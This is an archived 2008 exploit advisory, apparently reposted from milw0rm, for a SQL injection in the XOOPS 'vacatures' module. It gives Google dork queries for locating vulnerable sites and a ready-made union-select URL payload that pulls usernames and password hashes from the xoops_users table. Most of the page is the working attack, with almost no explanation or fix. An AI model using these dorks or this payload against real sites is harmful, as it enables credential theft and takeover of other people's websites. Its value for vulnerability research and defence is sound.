Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19202
HistoryFeb 20, 2008 - 12:00 a.m.

XOOPS Module vacatures SQL Injection

2008-02-2000:00:00
vulners.com
27

###############################################################

XOOPS Module vacatures SQL Injection

###############################################################

AUTHOR : S@BUN

HOME 1 : http://www.milw0rm.com/author/1334

MAİL : [email protected]

################################################################

DORK 1 : allinurl :"/modules/vacatures/index.php?pa=view"

DORK 2 : allinurl:

################################################################
EXPLOIT :

modules/vacatures/index.php?pa=view&cid=-00000//union//select//0000,concat(uname,0x3a,pass),concat(uname,0x3a,pass)//from/**/xoops_users/**where%20admin%20-111

################################################################

S@BUN i AM NOT HACKER S@BUN

################################################################